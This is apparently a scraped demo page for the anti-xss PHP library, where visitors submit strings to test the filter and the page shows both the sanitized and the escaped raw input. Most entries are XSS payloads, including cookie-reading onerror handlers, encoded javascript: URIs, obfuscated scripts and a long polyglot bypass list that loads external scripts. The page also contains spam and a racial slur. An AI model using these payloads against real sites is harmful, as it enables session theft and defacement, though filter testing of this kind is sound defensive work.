Anti-XSS for PHP

{ @hacker | "try to bypass this XSS filter" }

github.com/voku/anti-xss



If you need some inspiration for new attacks, take a look at the PHPUnit tests. I have already included test from e.g. "DOMPurify", "JS-XSS" and "LaravelSecurity". Here you can find some more XSS strings:



PS: This demo, is also available at github.com and you can also create pull-requests, here.

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert('xss')</script>

keyword(s): ads

description: asdasdasd

by asd | at 2020-06-03 14:22:07

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script src="home.php"/>

keyword(s): ads

description: asd

by asd | at 2020-06-03 14:21:37

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

"> href.location = www.google.fr;

result with twig: {{ xss.xss | escape }}:

"><script type="text/javascript"> href.location = www.google.fr; </script>

keyword(s):

description:

by Manouka | at 2020-06-03 11:38:26

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<img src onerror="alert(document.cookie)">

keyword(s): aa

description:

by aa | at 2020-06-03 10:20:19

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script src="home.php"/>

keyword(s):

description:

by | at 2020-06-02 07:18:42

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

$harm_string = "Hello, i try to your site"; $harmless_string = $antiXss->xss_clean($harm_string);

result with twig: {{ xss.xss | escape }}:

$harm_string = "Hello, i try to <script>alert('Hack');</script> your site"; $harmless_string = $antiXss->xss_clean($harm_string);

keyword(s): Proo

description: proo

by Thăng | at 2020-05-29 02:37:29

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert('hacker')</script>

keyword(s): Proo

description: prrr

by Thăng | at 2020-05-29 02:34:42

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<img src onerror="alert(document.cookie)">

keyword(s): Proo

description: prooo

by Thăng | at 2020-05-29 02:32:59

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert('hacker')</script>

keyword(s): tunghppp

description: tunghppp

by Meooo | at 2020-05-29 02:29:50

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert('hack')</script>

keyword(s): sdfds

description: dsfds

by sdfsf | at 2020-05-27 19:11:02

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert('hack')</script>

keyword(s): J

description: 123

by JM | at 2020-05-26 18:35:48

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<img src onerror="alert(document.cookie)">

keyword(s):

description:

by | at 2020-05-26 04:24:16

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

sdfsdfs

result with twig: {{ xss.xss | escape }}:

sdfsdfs

keyword(s): sdfsdf

description:

by sdsdf | at 2020-05-25 09:34:41

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert('hack')</script>

keyword(s): xss

description: some xss

by tmp | at 2020-05-22 12:21:18

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert('hack')</script>

keyword(s):

description:

by | at 2020-05-21 09:34:18

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert('hack')</script>

keyword(s): s

description: test

by julia | at 2020-05-21 00:05:43

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

dasdas

result with twig: {{ xss.xss | escape }}:

dasdas

keyword(s): asdas

description: sadas

by sadas | at 2020-05-20 13:40:47

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

alert('s');

result with twig: {{ xss.xss | escape }}:

alert('s');

keyword(s):

description:

by dsds | at 2020-05-20 07:50:40

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert('hack')</script>

keyword(s):

description:

by | at 2020-05-19 17:08:22

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

sqwq

result with twig: {{ xss.xss | escape }}:

sqwq<<script>alert('hack');</script>s<script>alert('hack');</script>c<script>alert('hack');</script>r<script>alert('hack');</script>i<script>alert('hack');</script>p<script>alert('hack');</script>t<script>alert('hack');</script>><script>alert('hack');</script>a<script>alert('hack');</script>l<script>alert('hack');</script>e<script>alert('hack');</script>r<script>alert('hack');</script>t<script>alert('hack');</script>(<script>alert('hack');</script>'<script>alert('hack');</script>h<script>alert('hack');</script>a<script>alert('hack');</script>c<script>alert('hack');</script>k<script>alert('hack');</script>'<script>alert('hack');</script>)<script>alert('hack');</script>;<script>alert('hack');</script><<script>alert('hack');</script>/<script>alert('hack');</script>s<script>alert('hack');</script>c<script>alert('hack');</script>r<script>alert('hack');</script>i<script>alert('hack');</script>p<script>alert('hack');</script>t<script>alert('hack');</script>><script>alert('hack');</script>

keyword(s):

description:

by tytdfud | at 2020-05-15 15:28:20

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

bffdgdalert('Hack');

result with twig: {{ xss.xss | escape }}:

bffdgd<scri pt>alert('Hack');</script>

keyword(s):

description:

by tytdfud | at 2020-05-15 15:26:52

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

bffdgd

result with twig: {{ xss.xss | escape }}:

bffdgd<script>alert('Hack');</script>

keyword(s):

description:

by hgfuh | at 2020-05-15 15:26:02

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<noscript

keyword(s): asf

description: saf

by asf | at 2020-05-14 21:56:04

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

javascript

result with twig: {{ xss.xss | escape }}:

javascript

keyword(s):

description:

by javascript | at 2020-05-14 18:56:55

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<IMG SRC="javascript:alert('XSS');">

keyword(s): big

description: descript

by Zod | at 2020-05-11 11:35:47

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

">

result with twig: {{ xss.xss | escape }}:

">

keyword(s):

description:

by "> | at 2020-05-10 11:36:20

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

here is your suckup.de 6 months traffic quote https://www.arteseo.co/unlimited-traffic/

result with twig: {{ xss.xss | escape }}:

here is your suckup.de 6 months traffic quote https://www.arteseo.co/unlimited-traffic/

keyword(s):

description: here is your suckup.de 6 months traffic quote https://www.arteseo.co/unlimited-traffic/

by Maryanne Cody | at 2020-05-10 10:55:20

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>console.log("nigger")</script>

keyword(s): asd

description:

by asd | at 2020-05-05 03:29:39

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>console.log("nigger")</script>

keyword(s): asd

description: sad

by | at 2020-05-04 07:42:37

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

cc

result with twig: {{ xss.xss | escape }}:

<h1>cc</h1>

keyword(s): cc

description: <h1>cc</h1>

by cc | at 2020-05-03 02:12:14

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert('hello')</script>

keyword(s):

description: fgdfhdhdhdh

by sdgbsdgbs | at 2020-05-02 11:50:08

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

sdsdd

result with twig: {{ xss.xss | escape }}:

sdsdd

keyword(s): abc

description: test

by lata | at 2020-05-01 13:16:40

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

{% xss_clean%} {{xss.xss | raw}} {% end_xss_clean%}:

result with twig: {{ xss.xss | escape }}:

{% xss_clean%} {{xss.xss | raw}} {% end_xss_clean%}:

keyword(s): 12

description:

by 12 | at 2020-05-01 08:06:41

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->'>=

result with twig: {{ xss.xss | escape }}:

;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}

keyword(s): test

description: test

by anonymous | at 2020-05-01 05:16:02

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert("d12");</script>

keyword(s): test

description: test

by test | at 2020-05-01 00:42:51

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<IMG SRC="jav&#x0D;ascript:alert('XSS');">

keyword(s): АВ

description:

by ФЫВ | at 2020-04-30 13:37:53

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

asfdsafd

result with twig: {{ xss.xss | escape }}:

asfdsafd

keyword(s): safdsadf

description: safsadf

by asdfsaf | at 2020-04-29 12:50:13

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

test

result with twig: {{ xss.xss | escape }}:

test

keyword(s):

description: test

by test | at 2020-04-27 10:54:35

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Hello, i try to your site

result with twig: {{ xss.xss | escape }}:

Hello, i try to <script>alert('Hack');</script> your site

keyword(s):

description: Hello, i try to your site

by test | at 2020-04-27 10:54:14

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

src=https://sqmsdb01.in.nawras.com.om/tatweer//public/img/avatars/su nny.png />

result with twig: {{ xss.xss | escape }}:

src=https://sqmsdb01.in.nawras.com.om/tatweer//public/img/avatars/su nny.png />

keyword(s): test

description: test

by test | at 2020-04-27 08:13:53

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Internal" >

result with twig: {{ xss.xss | escape }}:

Internal" ><img src="http://localhost/tatweer/server_localhost/public/img/avatars/sunny.png">

keyword(s): aaa

description:

by aa | at 2020-04-27 08:12:48

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

asd

result with twig: {{ xss.xss | escape }}:

asd

keyword(s): asd

description: “>

by asd | at 2020-04-27 03:32:21

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Love

result with twig: {{ xss.xss | escape }}:

<h1>Love</h1>

keyword(s): 2333

description: eeee

by test | at 2020-04-21 17:28:51

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

keyword(s): ee

description: eee

by test | at 2020-04-21 16:59:08

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Hello, i try to your site

result with twig: {{ xss.xss | escape }}:

Hello, i try to <script>alert('Hack');</script> your site

keyword(s): love

description: 13333

by test | at 2020-04-21 16:41:20

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script>

keyword(s): ddd

description: fdd

by ddd | at 2020-04-17 16:10:05

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//>

result with twig: {{ xss.xss | escape }}:

;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//></SCRIPT>--!><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

keyword(s): asd

description: asd

by asd | at 2020-04-17 16:09:26

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

result with twig: {{ xss.xss | escape }}:

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

keyword(s): asd

description: ads

by asd | at 2020-04-17 16:09:06

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

<<

result with twig: {{ xss.xss | escape }}:

</script></script><<<<script><>>>><<<script>alert(123)</script>

keyword(s): ads

description: asd

by asd | at 2020-04-17 16:07:52

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

XSS

result with twig: {{ xss.xss | escape }}:

&lt;A HREF=\"javascript&#058;document&#46;location='http&#58;//www&#46;google&#46;com/'\"&gt;XSS&lt;/A&gt;

keyword(s): asd

description: asd

by asd | at 2020-04-17 16:06:43

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<img src=`xx:xx`onerror=alert(1)>

keyword(s): asd

description: asd

by asd | at 2020-04-17 16:05:13

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

^__^

result with twig: {{ xss.xss | escape }}:

<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^

keyword(s): asd

description: asd

by asd | at 2020-04-17 16:04:58

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

^__^

result with twig: {{ xss.xss | escape }}:

<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^

keyword(s): asd

description: asd

by asd | at 2020-04-17 16:04:15

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

^__^

result with twig: {{ xss.xss | escape }}:

<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^

keyword(s): asd

description: asd

by asd | at 2020-04-17 16:04:15

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

<meta content=" 1 ; alert(1)" http-equiv="refresh"/>

result with twig: {{ xss.xss | escape }}:

<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>

keyword(s): asd

description: asd

by asd | at 2020-04-17 16:03:40

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

>

result with twig: {{ xss.xss | escape }}:

�><script>alert(�XSS�)</script>

keyword(s): asd

description: asd

by asd | at 2020-04-17 16:03:12

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

_=`${`${{}}`[!![]<

result with twig: {{ xss.xss | escape }}:

_=`${`${{}}`[!![]<<!![]<<!![]|!![]]}${`${{}}`[!!{}<<![]]}${`${[][~[]]}`[!!{}<<![]]}${`${!![][~[]]}`[(!![]<<!![])|!![]]}${`${![][~[]]}`[!{}<<![]]}${`${![][~[]]}`[!!{}<<![]]}${`${![][~[]]}`[!!{}<<!![]]}${`${{}}`[!![]<<!![]<<!![]|!![]]}${`${![][~[]]}`[!{}<<![]]}${`${{}}`[!!{}<<![]]}${`${![][~[]]}`[!!{}<<![]]}`,__=`${`${{}}`[!!{}<<![]]}${`${{}}`[!!{}<<!![]]}${`${!![][~[]]}`[[]<<[]]}${`${![][~[]]}`[!!{}<<!![]]}${`${!![][~[]]}`[(!![]<<!![])|!![]]}${`${{}}`[!![]<<!![]<<!![]|!![]]}${`${!![][~[]]}`[!!{}<<![]]}${`${![][~[]]}`[!{}<<![]]}${`${[][~[]]}`[!![]<<!![]<<!![]|!![]]}${`${{}}`[!!{}<<![]]}${`${[][~[]]}`[!!{}<<![]]}!`,[][_][_](`${`${{}}`[!![]<<!![]<<!![]|!![]]}${`${{}}`[!!{}<<![]]}${`${[][~[]]}`[!!{}<<![]]}${`${!![][~[]]}`[(!![]<<!![])|!![]]}${`${{}}`[!!{}<<![]]}${`${!![][~[]]}`[!!{}<<!![]]}${`${![][~[]]}`[(!![]<<!![])|!![]]}${`${{}}`[[]<<[]]}'${`${!![][~[]]}`[!!{}<<!![]]}${`${{}}`[!!{}<<![]]}${`${``[_]}`[!![]<<!![]<<!![]<<!![]^!![]<<!![]<<!![]|!!{}<<!![]]}'${`${{}}`[!![]<<!![]<<!![]<<!![]^!![]<<!![]<<!![]|!!{}<<!![]]}(__)`)()

keyword(s): asd

description: asd

by asd | at 2020-04-17 16:02:32

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Hello, i try to your site

result with twig: {{ xss.xss | escape }}:

Hello, i try to <script>alert('Hack');</script> your site

keyword(s):

description: savasv

by vsvs | at 2020-04-16 21:22:40

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

vfdvfdv

result with twig: {{ xss.xss | escape }}:

vfdvfdv

keyword(s):

description: dcvfdv

by dfvfv | at 2020-04-16 21:22:12

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

<iframe src=" prompt(1) " > <svg><style>{font-family:'<iframe/>' <input/ <sVg><isindex <img src='https://dl.dropbox.com/u/13018058/js.js'></object> <iframe src=PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"> <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=alert('XSS');\" <IFRAME SRC=\"alert('XSS');\"></IFRAME> <FRAMESET><FRAME SRC=\"alert('XSS');\"></FRAMESET>
<STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE> <>> <>.>< > <>> &> > <> <><> <> <> >&><>> <><><>& >&>]]> <> <><><>< ></XML> <XML SRC=\"xsstest.xml\" ID=I></XML> <HTML><BODY> <?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\"> <?import namespace=\"t\" implementation=\"#default#time2\"> </BODY></HTML> <!--#exec cmd=\"/bin/echo ''\"--> <? echo('alert(\"XSS\")'); ?> > <><> \" > \" '' > '\" > ` > '>\" > (\"<> < >> < >> < >> < >> < >> < >> < >> < >> < >> < >> < >> < >> < >> < >>

result with twig: {{ xss.xss | escape }}:

<iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00> <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>' <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" <sVg><scRipt %00>alert&lpar;1&rpar; {Opera} <img/src=`%00` onerror=this.onerror=confirm(1) <form><isindex formaction="javascript&colon;confirm(1)" <img src=`%00`&NewLine; onerror=alert(1)&NewLine; <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script> <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/ &#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00 <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>"> <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} <meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> <form><a href="javascript:\u0061lert&#x28;1&#x29;">X </script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'> <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)> <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;> <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a http://www.google<script .com>alert(document.location)</script <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a <img/src=@&#32;&#13; onerror = prompt('&#49;') <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41; <script ^__^>alert(String.fromCharCode(49))</script ^__^ </style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-( &#00;</form><input type&#61;"date" onfocus="alert(1)"> <form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'> <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ <iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'> <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a> <script ~~~>alert(0%0)</script ~~~> <style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;> <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>' &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera} <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^ <div/style="width:expression(confirm(1))">X</div> {IE7} <iframe/%00/ src=javaSCRIPT&colon;alert(1) //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>// /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style> <a/href="javascript:&#13; javascript:prompt(1)"><input type="X"> </plaintext\></|\><plaintext/onmouseover=prompt(1) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera} <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> <div onmouseover='alert&lpar;1&rpar;'>DIV</div> <iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <var onmouseover="prompt(1)">On Mouse Over</var> <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> <img src="/" =_=" title="onerror='prompt(1)'"> <%<!--'%><script>alert(1);</script --> <script src="data:text/javascript,alert(1)"></script> <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<><iframe/src=javascript:confirm(1) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div> http://www.<script>alert(1)</script .com <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> <svg><script ?>alert(1) <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> <img src=`xx:xx`onerror=alert(1)> <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/> <math><a xlink:href="//jsfiddle.net/t846h/">click <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> <svg contentScriptType=text/vbs><script>MsgBox+1 <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)> <script>+-+-1-+-+alert(1)</script> <body/onload=&lt;!--&gt;&#10alert(1)> <script itworksinallbrowsers>/*<script* */alert(1)</script <img src ?itworksonchrome?\/onerror = alert(1) <svg><script>//&NewLine;confirm(1);</script </svg> <svg><script onlypossibleinopera:-)> alert(1) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe <script x> alert(1) </script 1=2 <div/onmouseover='alert(1)'> style="x:"> <--`<img/src=` onerror=alert(1)> --!> <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> <div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> "><img src=x onerror=window.open('https://www.google.com/');> <form><button formaction=javascript&colon;alert(1)>CLICKME <math><a xlink:href="//jsfiddle.net/t846h/">click <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> <SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT> ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=”jav ascript:alert(‘XSS’);”> <IMG SRC=”jav&#x09;ascript:alert(‘XSS’);”> <<SCRIPT>alert(“XSS”);//<</SCRIPT> %253cscript%253ealert(1)%253c/script%253e “><s”%2b”cript>alert(document.cookie)</script> foo<script>alert(1)</script> <scr<script>ipt>alert(1)</scr</script>ipt> <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> <IMG 